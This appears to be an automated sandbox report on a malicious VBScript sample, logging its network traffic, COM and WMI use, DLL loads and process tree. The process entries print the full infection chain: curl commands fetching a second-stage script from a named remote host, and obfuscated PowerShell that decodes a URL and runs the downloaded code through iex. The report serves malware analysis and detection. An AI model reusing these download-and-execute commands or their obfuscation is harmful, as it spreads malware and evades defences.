            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holid
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA010F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
            Source: powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.6:49711 version: TLS 1.2

            System Summary

            barindex
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD344F294517_2_00007FFD344F2945
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD344F258D17_2_00007FFD344F258D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD344F2E3517_2_00007FFD344F2E35
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD344F537B17_2_00007FFD344F537B
            Source: 67618a47ee8c5.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@28/13@3/4
            Source: C:\Windows\System32\curl.exeFile created: C:\Users\Public\67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\bmkvfo.jsJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.jsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
